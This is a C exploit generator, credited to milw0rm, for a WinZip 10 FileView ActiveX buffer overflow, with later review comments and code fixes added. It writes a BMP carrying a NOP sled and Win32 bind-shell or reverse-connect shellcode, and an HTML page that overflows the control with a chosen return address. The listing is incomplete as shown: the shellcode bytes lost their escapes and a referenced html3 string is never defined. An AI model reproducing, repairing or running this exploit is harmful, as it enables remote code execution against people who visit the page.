
WinZip 10.0.7245 FileView ActiveX buffer overflow Exploit


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <unistd.h>
#include <getopt.h>

/* Number of 0x90 bytes main() writes between the BMP header and the payload
 * (the NOP sled the return address is meant to land in). */
#define NOPSIZE 999999

/* One supported build: a label for --help plus the 32-bit return address that
 * main() writes raw into the page between the two runs of 'A' padding. */
struct target {
    char *name;    /* printed by help() and setret() */
    int retaddr;   /* written with write(fd,&ret,4); must contain no 0x00 byte (main checks) */
};

/* One payload entry; the table itself is shellcodes[] below. */
struct shellcode {
    char *name;        /* description printed by help() and main() */
    short port;        /* byte offset at which main() patches a byte-swapped 16-bit port, or -1 if none */
    int host;          /* byte offset at which main() patches a 4-byte IPv4 address, or -1 if none */
    char *shellcode;   /* payload bytes; copied with strlen(), so it must not contain 0x00 */
};

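/* Known targets. The return address is specific to the WinZip build; the
 * comment records the IE build the listing says it was checked against. */
struct target targets[] = {
    /* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667) */
    {"WinXP SP2(en) WinZIP 10.0.6667", 0x02DA3269},
};

/* Number of entries in targets[]; derived from the table so help()'s loop
 * bound cannot drift from the real size (the listing hard-coded 1). */
int targetno = sizeof targets / sizeof targets[0];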

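/*
 * Payload table. Each entry carries a label, the byte offset at which main()
 * patches a 16-bit port in swapped (network) byte order (-1: no port), the
 * offset at which it patches a 4-byte IPv4 address (-1: none), and the bytes.
 *
 * NOTE(review): every backslash was stripped when this listing was pasted, so
 * each "xNN" below is what remains of a "\xNN" escape. As written these are
 * ASCII strings, not machine code; they are left untouched here rather than
 * re-assembled by hand. The offsets 162, 167 and 160 only make sense against
 * the restored byte strings. Restore from the original source before use.
 */
struct shellcode shellcodes[] = {
    {"Win32 x86 bind() shellcode (4444/tcp default)", 162, -1,
     "x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5"
     "x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9"
     "xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b"
     "x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b"
     "x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5"
     "x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03"
     "x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26"
     "x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6"
     "x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26"
     "x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03"
     "xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a"
     "x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f"
     "x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77"
     "x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f"
     "x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74"
     "x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0"
     "xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8"
     "x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73"
     "xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41"
     "xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d"
     "xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d"
     "x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70"
     "xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22"
     "x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43"
     "x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"},

    {"Win32 x86 connect() shellcode (4444/tcp default)", 167, 160,
     "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
     "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
     "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
     "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
     "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
     "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
     "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
     "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
     "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
     "xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68"
     "x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9"
     "xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68"
     "x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3"
     "xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab"
     "x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51"
     "x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6"
     "x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6"
     "xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"}
};

/* Number of entries in shellcodes[]; derived from the table so help()'s loop
 * bound cannot drift from the real size (the listing hard-coded 2). */
int shellno = sizeof shellcodes / sizeof shellcodes[0];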

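/*
 * Head of the generated page: a VBScript handler for the FileView control's
 * OnAfterItemAdd event that starts assigning FilePattern. The string literal
 * is left open on purpose: main() appends 265 bytes of 'A', the 4-byte return
 * address and 1827 more 'A' before html2 closes it — the listing's own comment
 * calls that overlong property value "smash the stack here".
 * The "\r\n" and "\"" escapes, which the forum paste had reduced to "rn" and a
 * bare quote, are restored.
 */
char html1[] = "<HTML>\r\n<HEAD>\r\n<TITLE></TITLE>\r\n</HEAD>\r\n"
               "<BODY>\r\n<SCRIPT LANGUAGE=\"VBScript\">\r\nSub WZ"
               "FILEVIEW_OnAfterItemAdd(Item)\r\nWZFILEVIEW.FilePa"
               "ttern = \"";   /* smash the stack here: padding follows */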

/*
 * Tail of the page: closes the FilePattern string and the Sub, then embeds
 * the WinZip FileView control by CLSID so the handler fires on load.
 *
 * NOTE(review): this listing lost every backslash in pasting. Each "rn" was
 * "\r\n" and each embedded quote was "\"" (the leading "" was "\"", and
 * ID="WZFILEVIEW" was ID=\"WZFILEVIEW\"). "%7Boption%7D" looks like a
 * URL-encoded "{option}" inserted by the forum, not page content. main()
 * writes html2, then the image path, then a `html3` that is defined nowhere in
 * this listing, so the original html2 very likely ended before </HTML> and
 * html3 carried the rest — confirm against the original source before use.
 */
char html2[]=""rnend subrn</SCRIPT>rn%7Boption%7Drn<OBJECT ID="WZFILEV"
"IEW" WIDTH=200 HEIGHT=200rnCLASSID="CLSID:A09A"
"E68F-B14D-43ED-B713-BA413F034904">rn</OBJECT>r"
"n</BODY>rn</HTML>rn";

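/*
 * 54-byte BMP header (14-byte file header + 40-byte BITMAPINFOHEADER) placed
 * in front of the NOP sled: "BM", declared file size 0x2dbb3e, pixel data at
 * offset 0x36, 999x999 pixels, 1 plane, 24 bits per pixel, declared image
 * size 0x2dbb08. The "\x" escapes, which the forum paste had stripped to
 * bare "xNN", are restored.
 * NOTE(review): the declared sizes exceed what main() writes
 * (54 + NOPSIZE + payload); whether the control checks them is not shown here.
 */
char bmphdr[] = "\x42\x4d\x3e\xbb\x2d\x00\x00\x00\x00\x00\x36\x00\x00"
                "\x00\x28\x00\x00\x00\xe7\x03\x00\x00\xe7\x03\x00\x00"
                "\x01\x00\x18\x00\x00\x00\x00\x00\x08\xbb\x2d\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00";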

/* Return address chosen via -t (filled in by setret); main() checks it for
 * embedded 0x00 bytes and writes its 4 raw bytes into the page. */
int ret;

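/*
 * Print usage, the target table and the shellcode table, then exit(0).
 * progname: argv[0], echoed into the usage line.
 *
 * Fixes versus the listing: targets[count] was passed whole to %s and %x
 * (undefined behaviour) instead of .name and .retaddr; strlen() results are
 * printed with %zu; the --shellhost short flag is -d, matching options[] in
 * main(), not -i (which is --imgname); the stripped "\n" escapes are restored.
 */
void help(char *progname)
{
    printf("[ Usage instructions.\n[\n");
    printf("[ %s <required> (optional)\n[\n[ --filename|-f <file.html>\n", progname);
    printf("[ --imgname|-i <image.bmp>\n[ --shellcode|-s <shell#>\n");
    printf("[ --shellport|-p (port)\n");
    printf("[ --shellhost|-d (ip)\n");
    printf("[ --target|-t <target#/0xretaddr>\n[\n");

    printf("[ Target#'s\n");
    for (int count = 0; count < targetno; count++) {
        printf("[ %d %s 0x%x\n", count, targets[count].name,
               (unsigned)targets[count].retaddr);
    }

    printf("[\n[ Shellcode#'s\n");
    for (int count = 0; count < shellno; count++) {
        printf("[ %d \"%s\" (length %zu bytes)\n", count, shellcodes[count].name,
               strlen(shellcodes[count].shellcode));
    }
    exit(0);
}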

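/*
 * Resolve the -t argument into the global `ret`.
 *   "0x..." / "0X..."  — a literal return address, parsed as hex.
 *   anything else      — a decimal index into targets[].
 *
 * The listing had this backwards: atoi("0x...") is 0, so every hex address
 * selected targets[0], while "1" was re-parsed as hex 0x1; and the index used
 * the stale global `ret` instead of the parsed value, so a second -t indexed
 * targets[] with an address. Out-of-range or malformed input now exits.
 */
void setret(char *retarg)
{
    const size_t ntargets = sizeof targets / sizeof targets[0];
    char *end = NULL;

    if (retarg[0] == '0' && (retarg[1] == 'x' || retarg[1] == 'X')) {
        unsigned long addr = strtoul(retarg, &end, 16);
        if (end == retarg || *end != '\0') {
            fprintf(stderr, "[ Invalid return address '%s'\n", retarg);
            exit(1);
        }
        ret = (int)addr;   /* 32-bit value; written raw into the page by main() */
        printf("[ Using return address '0x%x'\n", (unsigned)ret);
        return;
    }

    long idx = strtol(retarg, &end, 10);
    if (end == retarg || *end != '\0' || idx < 0 || (unsigned long)idx >= ntargets) {
        fprintf(stderr, "[ Invalid target selection '%s'\n", retarg);
        exit(1);
    }
    printf("[ Using target '%s'\n", targets[idx].name);
    ret = targets[idx].retaddr;
}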

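/* Byte counts written around the return address inside FilePattern
 * (265 + 4 + 1827 = 2096 bytes), taken verbatim from the listing. */
enum { PAD_BEFORE_RET = 265, PAD_AFTER_RET = 1827, FILL_CHUNK = 4096 };

/* Write all `len` bytes of `buf` to `fd`, retrying short writes.
 * Returns 0 on success, -1 when write(2) fails or makes no progress. */
static int write_all(int fd, const void *buf, size_t len)
{
    const unsigned char *p = buf;
    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n <= 0)
            return -1;
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Write `len` copies of byte `b` to `fd` in FILL_CHUNK-sized writes
 * (the listing issued one write(2) per byte: a million syscalls for the sled). */
static int write_fill(int fd, unsigned char b, size_t len)
{
    unsigned char chunk[FILL_CHUNK];
    memset(chunk, b, sizeof chunk);
    while (len > 0) {
        size_t step = len < sizeof chunk ? len : sizeof chunk;
        if (write_all(fd, chunk, step) < 0)
            return -1;
        len -= step;
    }
    return 0;
}

/* Create or truncate `path` as a private 0600 output file; -1 on failure.
 * The listing opened without O_TRUNC (stale bytes survived a re-run) and
 * with S_IRWXU, giving data files an execute bit for no reason. */
static int create_output(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd == -1)
        fprintf(stderr, "[ Error creating %s\n", path);
    return fd;
}

/* Emit the BMP: 54-byte header, NOPSIZE bytes of 0x90, then the payload. */
static int create_image(const char *img, const char *payload)
{
    int fd = create_output(img);
    if (fd == -1)
        return -1;
    int rc = -1;
    /* sizeof bmphdr counts the C string terminator; the listing wrote it too,
     * pushing the pixel data one byte past the offset the header declares. */
    if (write_all(fd, bmphdr, sizeof bmphdr - 1) < 0) goto out;
    if (write_fill(fd, 0x90, NOPSIZE) < 0) goto out;
    if (write_all(fd, payload, strlen(payload)) < 0) goto out;
    rc = 0;
out:
    if (close(fd) < 0)
        rc = -1;
    return rc;
}

/* Emit the page: html1, 'A' padding, the raw return address, more padding,
 * html2, the image path as given on the command line, then html3. */
static int create_html(const char *file, const char *img)
{
    int fd = create_output(file);
    if (fd == -1)
        return -1;
    int rc = -1;
    if (write_all(fd, html1, strlen(html1)) < 0) goto out;
    if (write_fill(fd, 'A', PAD_BEFORE_RET) < 0) goto out;
    if (write_all(fd, &ret, sizeof ret) < 0) goto out;   /* host byte order, as the listing did */
    if (write_fill(fd, 'A', PAD_AFTER_RET) < 0) goto out;
    if (write_all(fd, html2, strlen(html2)) < 0) goto out;
    if (write_all(fd, img, strlen(img)) < 0) goto out;
    /* NOTE(review): html3 is used by the listing but defined nowhere in it;
     * the reference is kept so the gap stays visible instead of being dropped. */
    if (write_all(fd, html3, strlen(html3)) < 0) goto out;
    rc = 0;
out:
    if (close(fd) < 0)
        rc = -1;
    return rc;
}

/*
 * Entry point: parse options, then write the BMP that carries the NOP sled
 * and payload, and the HTML page that loads the FileView control with an
 * oversized FilePattern value (padding, return address, padding).
 *
 * Required: -f <file.html> -i <image.bmp> -s <shell#> -t <target#|0xaddr>.
 * Optional: -p <port> and -d <ip>, which patch the selected payload in place
 * and must follow -s. Exits 0 on success; non-zero (or 0 for a usage error,
 * as in the listing) otherwise.
 *
 * Fixes versus the listing, which does not compile as pasted (every backslash
 * was stripped, so "\n" became "n" and "switch(c)" became "switch©"):
 *   - `c` is no longer read before it is assigned.
 *   - options[] ends with the all-zero entry getopt_long requires.
 *   - the optstring says "d:" for --shellhost; it said "D:", so -d was
 *     silently ignored through the default branch.
 *   - file/img/payload start NULL and are checked, instead of strlen() on an
 *     uninitialised pointer.
 *   - null-byte checks on the address, port and host look at the actual bytes
 *     with memchr() rather than strlen() of an int.
 *   - the port goes through htons() instead of a hand-rolled shift on a
 *     signed short; the host is validated with inet_pton(); both patches are
 *     bounds-checked against the payload length.
 *   - output files are truncated, created 0600, written with short-write
 *     handling, and the BMP header is written without its terminator.
 */
int main(int argc, char *argv[])
{
    static const struct option options[] = {
        {"filename",  1, 0, 'f'},
        {"imgname",   1, 0, 'i'},
        {"target",    1, 0, 't'},
        {"shellcode", 1, 0, 's'},
        {"shellport", 1, 0, 'p'},
        {"shellhost", 1, 0, 'd'},
        {"help",      0, 0, 'h'},
        {0, 0, 0, 0}   /* terminator: getopt_long reads until it finds this */
    };
    const char *file = NULL;
    const char *img = NULL;
    char *payload = NULL;   /* private copy of the chosen shellcode, patched in place */
    int payg = -1;          /* index into shellcodes[] once -s has been parsed */
    int itarg = 0;
    int c;

    printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploit\n");

    while ((c = getopt_long(argc, argv, "f:i:t:s:p:d:h", options, NULL)) != -1) {
        switch (c) {
        case 'f':
            file = optarg;
            break;

        case 'i':
            img = optarg;
            break;

        case 't':
            itarg = 1;
            setret(optarg);
            /* A 0x00 byte inside the address would end the string in the page. */
            if (memchr(&ret, 0, sizeof ret) != NULL) {
                fprintf(stderr, "[ Selected target contains a null address!\n");
                exit(-1);
            }
            break;

        case 's':
            if (payload != NULL)
                break;   /* first -s wins, as in the listing */
            {
                long sel = strtol(optarg, NULL, 10);
                if (sel < 0 || sel >= (long)(sizeof shellcodes / sizeof shellcodes[0])) {
                    printf("[ Invalid shellcode selection %ld\n", sel);
                    exit(0);
                }
                payg = (int)sel;
                size_t len = strlen(shellcodes[payg].shellcode);
                printf("[ Using shellcode '%s' (%zu bytes)\n", shellcodes[payg].name, len);
                payload = malloc(len + 1);
                if (payload == NULL) {
                    fprintf(stderr, "[ Out of memory\n");
                    exit(-1);
                }
                memcpy(payload, shellcodes[payg].shellcode, len + 1);   /* includes the terminator */
            }
            break;

        case 'p':
            if (payload == NULL) {
                printf("[ No shellcode selected yet, ignoring (%s) port selection\n", optarg);
            } else if (shellcodes[payg].port < 0) {
                printf("[ (%s) port selection is ignored for current shellcode\n", optarg);
            } else {
                long pv = strtol(optarg, NULL, 10);
                if (pv < 1 || pv > 65535) {
                    fprintf(stderr, "[ Invalid port '%s'\n", optarg);
                    exit(1);
                }
                uint16_t port = htons((uint16_t)pv);   /* the payload expects the swapped form */
                if ((size_t)shellcodes[payg].port + sizeof port > strlen(payload)) {
                    fprintf(stderr, "[ Port offset lies outside the shellcode\n");
                    exit(1);
                }
                if (memchr(&port, 0, sizeof port) != NULL) {
                    printf("[ Error shellcode port introduces null bytes\n");
                    exit(1);
                }
                memcpy(payload + shellcodes[payg].port, &port, sizeof port);
                printf("[ Shellcode port changed to '%ld'\n", pv);
            }
            break;

        case 'd':
            if (payload == NULL) {
                printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n", optarg);
            } else if (shellcodes[payg].host < 0) {
                printf("[ (%s) shellhost selection is ignored for current shellcode\n", optarg);
            } else {
                struct in_addr a;
                if (inet_pton(AF_INET, optarg, &a) != 1) {
                    fprintf(stderr, "[ Invalid shellhost '%s'\n", optarg);
                    exit(1);
                }
                if ((size_t)shellcodes[payg].host + sizeof a.s_addr > strlen(payload)) {
                    fprintf(stderr, "[ Host offset lies outside the shellcode\n");
                    exit(1);
                }
                if (memchr(&a.s_addr, 0, sizeof a.s_addr) != NULL) {
                    printf("[ Error shellhost introduces null bytes\n");
                    exit(1);
                }
                memcpy(payload + shellcodes[payg].host, &a.s_addr, sizeof a.s_addr);
                printf("[ Shellhost has been changed to '%s'\n", optarg);
            }
            break;

        case 'h':
            help(argv[0]);   /* prints usage and exits */
            break;

        default:
            break;
        }
    }

    if (payload == NULL || !itarg || file == NULL || *file == '\0' || img == NULL || *img == '\0') {
        printf("[ Error insufficient arguements, try running '%s --help'\n", argv[0]);
        exit(0);
    }

    printf("[ Creating image containing shellcode '%s'\n", img);
    if (create_image(img, payload) < 0)
        exit(-1);

    printf("[ Creating html exploit page '%s'\n", file);
    if (create_html(file, img) < 0)
        exit(-1);

    free(payload);
    return 0;
}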

// milw0rm.com [2006-11-15]
